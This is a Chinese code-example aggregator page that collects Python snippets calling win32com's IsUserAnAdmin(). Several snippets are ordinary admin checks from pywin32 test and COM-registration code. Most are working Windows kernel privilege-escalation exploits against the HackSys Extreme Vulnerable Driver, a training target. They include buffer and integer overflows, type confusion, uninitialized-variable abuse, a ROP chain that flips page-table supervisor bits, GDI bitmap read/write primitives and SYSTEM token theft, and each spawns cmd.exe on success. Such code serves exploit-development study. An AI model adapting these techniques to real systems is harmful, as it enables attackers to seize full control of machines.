我们从Python开源项目中,提取了以下18个代码示例,用于说明如何使用win32com.shell.shell.IsUserAnAdmin()。
def check_is_admin(): global _is_admin if _is_admin is None: from win32com.shell.shell import IsUserAnAdmin import pythoncom try: _is_admin = IsUserAnAdmin() except pythoncom.com_error, exc: if exc.hresult != winerror.E_NOTIMPL: raise # not impl on this platform - must be old - assume is admin _is_admin = True return _is_admin # If this exception is raised by a test, the test is reported as a 'skip'
def trigger_integer_overflow(): dwReturn = c_ulong() driver_handle = kernel32.CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver", 0xC0000000,0, None, 0x3, 0, None) if not driver_handle or driver_handle == -1: print "[!] Driver handle not found : Error " + str(ctypes.GetLastError()) sys.exit() # [-- BUFFER PADDING --][-- EXTRA PADDING --][-- SHELLCODE PTR --][-- STRING TERMINATOR --] print "[+] Constructing overflow string" evil_input = "A" * 0x800 + "BBBB" * 10 + struct.pack("<L",heap_alloc_payload()) + struct.pack("<L",0xBAD0B0B0) evil_size = len(evil_input) evil_input_ptr = id(evil_input) + 20 print "[+] Buf size: %d" % evil_size einput = create_string_buffer(evil_input, evil_size) print "[+] Triggering vuln .." kernel32.DeviceIoControl(driver_handle, 0x222027, evil_input_ptr, 0xFFFFFFFF, None, 0,byref(dwReturn), None) if shell.IsUserAnAdmin(): print "[*] Enjoy Elevated Privs !\r\n" os.system('cmd.exe') else: print "[-] Exploit did not work. Re-run it!"
def trigger_nullpointer_dereference(): dwReturn = c_ulong() driver_handle = kernel32.CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver", 0xC0000000,0, None, 0x3, 0, None) if not driver_handle or driver_handle == -1: print "[!] Driver handle not found : Error " + str(ctypes.GetLastError()) sys.exit() NtAllocateVirtualMemory_shellcode_ptr() magicvalue = struct.pack("<L", 0xBAD0B0B1) #as long as it's not 0xBAD0B0B0 magicvalue_size = len(magicvalue) magicvalue_ptr = id(magicvalue) + 20 dev_ioctl = kernel32.DeviceIoControl(driver_handle, 0x22202B, magicvalue_ptr, magicvalue_size, None, 0,byref(dwReturn), None) if shell.IsUserAnAdmin(): print "[*] Enjoy Elevated Privs !\r\n" os.system('cmd.exe') else: print "[-] Exploit did not work. Re-run it!"
def trigger_stack_overflow(): dwReturn = c_ulong() driver_handle = kernel32.CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver", 0xC0000000,0, None, 0x3, 0, None) if not driver_handle or driver_handle == -1: print "[!] Driver handle not found : Error " + str(ctypes.GetLastError()) sys.exit() print "[+] Constructing malicious buffer" evil_input = "\x41" * 2080 + struct.pack("<L",heap_alloc_payload()) evil_size = len(evil_input) evil_input_ptr = id(evil_input) + 20 print "[+] Buf size: %d" % evil_size print "[+] Sending malicious buffer" print "[+] Triggering vuln .." kernel32.DeviceIoControl(driver_handle, 0x222003, evil_input_ptr, evil_size, None, 0,byref(dwReturn) , None) if shell.IsUserAnAdmin(): print "[*] Enjoy Elevated Privs !\r\n" os.system('cmd.exe') else: print "[!] Exploit did not work. Re-run it!"
def trigger_stack_overflow_GS(): dwReturn = c_ulong() driver_handle = kernel32.CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver", 0xC0000000,0, None, 0x3, 0, None) if not driver_handle or driver_handle == -1: print "[!] Driver handle not found : Error " + str(ctypes.GetLastError()) sys.exit() buffer_ptr, buffer_size = create_map_file() print "[+] Sending malicious buffer" print "[+] Triggering vuln .." # Note buffer_size + 4 : +4 resides outside the mapped file to trigger an exception when memcpy the region # before GS check, which BSODs box kernel32.DeviceIoControl(driver_handle, 0x222007, buffer_ptr, buffer_size + 4, None, 0,byref(dwReturn) , None) if shell.IsUserAnAdmin(): print "[*] Enjoy Elevated Privs !\r\n" os.system('cmd.exe') else: print "[!] Exploit did not work. Re-run it!"
def trigger_uninitialized_heap_variable(): dwReturn = c_ulong() driver_handle = kernel32.CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver", 0xC0000000,0, None, 0x3, 0, None) if not driver_handle or driver_handle == -1: print "[!] Driver handle not found : Error " + str(ctypes.GetLastError()) sys.exit() magicvalue = struct.pack('<I', 0xBAD0B0B1) magicvalue_ptr = id(magicvalue) + 20 magicvalue_size = len(magicvalue) tainting_lookaside() print "[+] Triggering vuln .." kernel32.DeviceIoControl(driver_handle, 0x00222033, magicvalue_ptr, magicvalue_size, None, 0,byref(dwReturn), None) if shell.IsUserAnAdmin(): print "[*] Enjoy Elevated Privs !\r\n" os.system('cmd.exe') else: print "[-] Exploit did not work. Re-run it!"
def check_is_admin(): global _is_admin if _is_admin is None: from win32com.shell.shell import IsUserAnAdmin import pythoncom try: _is_admin = IsUserAnAdmin() except pythoncom.com_error as exc: if exc.hresult != winerror.E_NOTIMPL: raise # not impl on this platform - must be old - assume is admin _is_admin = True return _is_admin # If this exception is raised by a test, the test is reported as a 'skip'
def trigger_arbitrary_overwrite(): dwReturn = c_ulong() driver_handle = kernel32.CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver", 0xC0000000,0, None, 0x3, 0, None) if not driver_handle or driver_handle == -1: print "[!] Driver handle not found : Error " + str(ctypes.GetLastError()) sys.exit() # [ -- WHAT (Shellcode pointer) -- ] [ -- WHERE (HDT_kernel_address + 4)-- ] write_what = heap_alloc_payload() write_where = get_HDT_kernel_address() + 4 write_what_ptr = c_void_p(write_what) evil_input = struct.pack("<L", addressof(write_what_ptr)) + struct.pack("<L", write_where) evil_input_ptr = id(evil_input) + 20 evil_size = len(evil_input) print "[+] Writing 0x%X at address 0x%X" % (write_what, write_where) kernel32.DeviceIoControl(driver_handle, 0x22200B, evil_input_ptr, evil_size, None, 0,byref(dwReturn), None) print "[+] Calling NtQueryIntervalProfile to trigger vuln" arb = c_ulong(0) ntdll.NtQueryIntervalProfile(0x1337, byref(arb)) if shell.IsUserAnAdmin(): print "[*] Enjoy Elevated Privs !\r\n" os.system('cmd.exe') else: print "[-] Exploit did not work. Re-run it!"
def trigger_uninitialized_stack_variable(): dwReturn = c_ulong() driver_handle = kernel32.CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver", 0xC0000000,0, None, 0x3, 0, None) if not driver_handle or driver_handle == -1: print "[!] Driver handle not found : Error " + str(ctypes.GetLastError()) sys.exit() magicvalue = struct.pack("<L", 0xBAD0B0B1) #as long as it's not 0xBAD0B0B0 magicvalue_ptr = id(magicvalue) + 20 magicvalue_size = len(magicvalue) print "[+] Buf size: %d" % magicvalue_size einput = create_string_buffer(magicvalue, magicvalue_size) # stack spray shellcode_ptr = heap_alloc_payload() print "[+] Spraying stack with address: 0x%X" % shellcode_ptr print "[+] Triggering vuln .." ntdll.NtMapUserPhysicalPages(0, 1024, struct.pack("<L", shellcode_ptr) * 1024) kernel32.DeviceIoControl(driver_handle, 0x22202F, magicvalue_ptr, magicvalue_size, None, 0,byref(dwReturn), None) if shell.IsUserAnAdmin(): print "[*] Enjoy Elevated Privs !\r\n" os.system('cmd.exe') else: print "[-] Exploit did not work. Re-run it!"
def trigger_type_confusion(): dwReturn = c_ulong() driver_handle = kernel32.CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver", 0xC0000000,0, None, 0x3, 0, None) if not driver_handle or driver_handle == -1: print "[!] Driver handle not found : Error " + str(ctypes.GetLastError()) sys.exit() #### # typedef struct _USER_TYPE_CONFUSION_OBJECT { # ULONG ObjectID; # ULONG ObjectType; # } USER_TYPE_CONFUSION_OBJECT, *PUSER_TYPE_CONFUSION_OBJECT; #### print "[+] Constructing USER_TYPE_CONFUSION_OBJECT" evil_input = "\x41" * 4 + struct.pack("<L",heap_alloc_payload()) evil_input_ptr = id(evil_input) + 20 evil_size = len(evil_input) print "[+] Buf size: %d" % evil_size print "[+] Sending confusion object" print "[+] Triggering vuln .." dev_ioctl = kernel32.DeviceIoControl(driver_handle, 0x222023, evil_input_ptr, evil_size, None, 0,byref(dwReturn) , None) if shell.IsUserAnAdmin(): print "[*] Enjoy Elevated Privs !\r\n" os.system('cmd.exe') else: print "[!] Exploit did not work. Re-run it!"
def trigger_stack_overflow(): dwReturn = c_ulong() driver_handle = kernel32.CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver", 0xC0000000,0, None, 0x3, 0, None) if not driver_handle or driver_handle == -1: debug_print ("[!] Driver handle not found : Error " + str(ctypes.GetLastError())) sys.exit() base_addresses = get_base_address(["hal.dll", "win32kfull.sys"]) hal_base_address = base_addresses[0] win32kfull_base_address = base_addresses[1] shellcode_ptr = virtual_alloc_payload() debug_print ("[+] Constructing malicious buffer w/ ROP chain") evil_input = "\x41" * 0x808 # junk evil_input += struct.pack("<Q", win32kfull_base_address + 0xD1122) # POP RDX; RETN evil_input += struct.pack("<Q", 0x63000000) # 0x63000000 -> Supervisor Mode evil_input += struct.pack("<Q", hal_base_address + 0xFDB2) # POP RAX; RETN evil_input += struct.pack("<Q", get_pxe_address(shellcode_ptr) - 3) # PTE(shellcode ptr) - 3 evil_input += struct.pack("<Q", hal_base_address + 0x9943) # MOV [RAX], EDX; RETN evil_input += struct.pack("<Q", hal_base_address + 0x19B20) # Invalidate Cache evil_input += struct.pack("<Q", shellcode_ptr) # shellcode ptr evil_size = len(evil_input) evil_input_ptr = id(evil_input) + 32 debug_print ("[+] Buf size: 0x%X" % evil_size) debug_print ("[+] Sending malicious buffer") debug_print ("[+] Triggering vuln ..") kernel32.DeviceIoControl(driver_handle, 0x222003, evil_input_ptr, evil_size, None, 0,byref(dwReturn), None) if shell.IsUserAnAdmin(): debug_print ("[*] Enjoy Elevated Privs !\n") os.system('cmd.exe') else: debug_print ("[!] Exploit did not work. Re-run it!")
def RegisterPythonServer(filename, progids=None, verbose=0): if progids: if isinstance(progids, str): progids = [progids] # we know the CLSIDs we need, but we might not be an admin user # and otherwise unable to register them. So as long as the progids # exist and the DLL points at our version, assume it already is. why_not = None for progid in progids: try: clsid = pythoncom.MakeIID(progid) except pythoncom.com_error: # no progid - not registered. break # have a CLSID - open it. try: HKCR = winreg.HKEY_CLASSES_ROOT hk = winreg.OpenKey(HKCR, "CLSID\\%s" % clsid) dll = winreg.QueryValue(hk, "InprocServer32") except WindowsError: # no CLSID or InProcServer32 - not good! break ok_files = [os.path.basename(pythoncom.__file__), 'pythoncomloader%d%d.dll' % (sys.version_info[0], sys.version_info[1])] if os.path.basename(dll) not in ok_files: why_not = "%r is registered against a different Python version (%s)" % (progid, dll) break else: #print "Skipping registration of '%s' - already registered" % filename return # needs registration - see if its likely! try: from win32com.shell.shell import IsUserAnAdmin except ImportError: print("Can't import win32com.shell - no idea if you are an admin or not?") is_admin = False else: try: is_admin = IsUserAnAdmin() except pythoncom.com_error: # old, less-secure OS - assume *is* admin. is_admin = True if not is_admin: msg = "%r isn't registered, but I'm not an administrator who can register it." % progids[0] if why_not: msg += "\n(registration check failed as %s)" % why_not # throw a normal "class not registered" exception - we don't report # them the same way as "real" errors. raise pythoncom.com_error(winerror.CO_E_CLASSSTRING, msg, None, -1) # so theoretically we are able to register it. cmd = '%s "%s" --unattended > nul 2>&1' % (win32api.GetModuleFileName(0), filename) if verbose: print("Registering engine", filename) # print cmd rc = os.system(cmd) if rc: print("Registration command was:") print(cmd) raise RuntimeError("Registration of engine '%s' failed" % filename)
def RegisterPythonServer(filename, progids=None, verbose=0): if progids: if isinstance(progids, basestring): progids = [progids] # we know the CLSIDs we need, but we might not be an admin user # and otherwise unable to register them. So as long as the progids # exist and the DLL points at our version, assume it already is. why_not = None for progid in progids: try: clsid = pythoncom.MakeIID(progid) except pythoncom.com_error: # no progid - not registered. break # have a CLSID - open it. try: HKCR = _winreg.HKEY_CLASSES_ROOT hk = _winreg.OpenKey(HKCR, "CLSID\\%s" % clsid) dll = _winreg.QueryValue(hk, "InprocServer32") except WindowsError: # no CLSID or InProcServer32 - not good! break ok_files = [os.path.basename(pythoncom.__file__), 'pythoncomloader%d%d.dll' % (sys.version_info[0], sys.version_info[1])] if os.path.basename(dll) not in ok_files: why_not = "%r is registered against a different Python version (%s)" % (progid, dll) break else: #print "Skipping registration of '%s' - already registered" % filename return # needs registration - see if its likely! try: from win32com.shell.shell import IsUserAnAdmin except ImportError: print "Can't import win32com.shell - no idea if you are an admin or not?" is_admin = False else: try: is_admin = IsUserAnAdmin() except pythoncom.com_error: # old, less-secure OS - assume *is* admin. is_admin = True if not is_admin: msg = "%r isn't registered, but I'm not an administrator who can register it." % progids[0] if why_not: msg += "\n(registration check failed as %s)" % why_not # throw a normal "class not registered" exception - we don't report # them the same way as "real" errors. raise pythoncom.com_error(winerror.CO_E_CLASSSTRING, msg, None, -1) # so theoretically we are able to register it. cmd = '%s "%s" --unattended > nul 2>&1' % (win32api.GetModuleFileName(0), filename) if verbose: print "Registering engine", filename # print cmd rc = os.system(cmd) if rc: print "Registration command was:" print cmd raise RuntimeError("Registration of engine '%s' failed" % filename)
def trigger_arbitrary_overwrite(): """ Main Logic """ driver_handle = kernel32.CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver", 0xC0000000,0, None, 0x3, 0, None) if not driver_handle or driver_handle == -1: print "[!] Driver handle not found : Error " + str(ctypes.GetLastError()) sys.exit() global hManager, hWorker # Massaging heap for Manager Bitmap debug_print ("[>] Setting up Manager Bitmap:") debug_print ("\t[+] Allocating and Freeing AcceleratorTables") dup_address = alloc_free_accelerator_tables() setup_manager_bitmap() hManager_pvscan0_offset = dup_address + 0x50 debug_print ("\t[+] Manager Bitmap pvscan0 offset: 0x%X" % hManager_pvscan0_offset) # Massaging heap for Worker Bitmap debug_print ("\n[>] Setting up Worker Bitmap:") debug_print ("\t[+] Allocating and Freeing AcceleratorTables") dup_address = alloc_free_accelerator_tables() setup_worker_bitmap() hWorker_pvscan0_offset = dup_address + 0x50 debug_print ("\t[+] Worker Bitmap pvscan0 offset: 0x%X" % hWorker_pvscan0_offset) # Using WWW to overwrite Manager pvscan0 value with address of Worker pvscan0 write_where = hManager_pvscan0_offset write_what_ptr = c_void_p(hWorker_pvscan0_offset) evil_input = struct.pack("<Q", addressof(write_what_ptr)) + struct.pack("<Q", write_where) evil_input_ptr = id(evil_input) + 32 evil_size = len(evil_input) debug_print ("\n[+] Triggering W-W-W to overwrite Manager pvscan0 value with Worker pvscan0 address") dwReturn = c_ulong() kernel32.DeviceIoControl(driver_handle, 0x22200B, evil_input_ptr, evil_size, None, 0,byref(dwReturn), None) # Get SYSTEM EPROCESS system_EPROCESS = get_PsISP_kernel_address() debug_print ("\n[+] SYSTEM EPROCESS: 0x%X" % system_EPROCESS) # Get current EPROCESS current_EPROCESS = get_current_eprocess(system_EPROCESS) debug_print ("[+] current EPROCESS: 0x%X" % current_EPROCESS) system_token = c_ulonglong() debug_print ("\r\n[+] Reading System TOKEN") read_virtual(system_EPROCESS + token_offset, byref(system_token), sizeof(system_token)); debug_print ("[+] Writing System TOKEN") write_virtual(current_EPROCESS + token_offset, byref(system_token), sizeof(system_token)); if shell.IsUserAnAdmin(): print "[*] Enjoy Elevated Privs !\r\n" os.system('cmd.exe') else: print "[-] Exploit did not work. Re-run it!"
def trigger_arbitrary_overwrite(): """ Main Logic """ driver_handle = kernel32.CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver", 0xC0000000,0, None, 0x3, 0, None) if not driver_handle or driver_handle == -1: print "[!] Driver handle not found : Error " + str(ctypes.GetLastError()) sys.exit() global hManager, hWorker # Calculate pointer to HMValidateHandle findHMValidateHandle() #Massaging heap for Manager Bitmap debug_print ("[>] Setting up Manager Bitmap:") debug_print ("\t[+] Allocating and Freeing Windows") dup_address = alloc_free_windows() setup_manager_bitmap() hManager_pvscan0_offset = dup_address + 0x50 debug_print ("\t[+] Manager bitmap pvscan0 offset: 0x%X" % hManager_pvscan0_offset) #Massaging heap for Worker Bitmap debug_print ("[>] Setting up Worker Bitmap:") debug_print ("\t[+] Allocating and Freeing Windows") dup_address = alloc_free_windows() setup_worker_bitmap() hWorker_pvscan0_offset = dup_address + 0x50 debug_print ("\t[+] Worker bitmap pvscan0 offset: 0x%X" % hWorker_pvscan0_offset) # Using WWW to overwrite Manager pvscan0 value with address of Worker pvscan0 write_where = hManager_pvscan0_offset write_what_ptr = c_void_p(hWorker_pvscan0_offset) evil_input = struct.pack("<Q", addressof(write_what_ptr)) + struct.pack("<Q", write_where) evil_input_ptr = id(evil_input) + 32 evil_size = len(evil_input) debug_print ("\n[+] Triggering W-W-W to overwrite Manager pvscan0 value with Worker pvscan0 address") dwReturn = c_ulong() kernel32.DeviceIoControl(driver_handle, 0x22200B, evil_input_ptr, evil_size, None, 0,byref(dwReturn), None) # Get SYSTEM EPROCESS system_EPROCESS = get_PsISP_kernel_address() debug_print ("\n[+] SYSTEM EPROCESS: 0x%X" % system_EPROCESS) # Get current EPROCESS current_EPROCESS = get_current_eprocess(system_EPROCESS) debug_print ("[+] current EPROCESS: 0x%X" % current_EPROCESS) system_token = c_ulonglong() debug_print ("\r\n[+] Reading System TOKEN") read_virtual(system_EPROCESS + token_offset, byref(system_token), sizeof(system_token)); debug_print ("[+] Writing System TOKEN") write_virtual(current_EPROCESS + token_offset, byref(system_token), sizeof(system_token)); if shell.IsUserAnAdmin(): debug_print("[*] Enjoy Elevated Privs !\r\n") os.system('cmd.exe') else: debug_print("[-] Exploit did not work. Re-run it!")
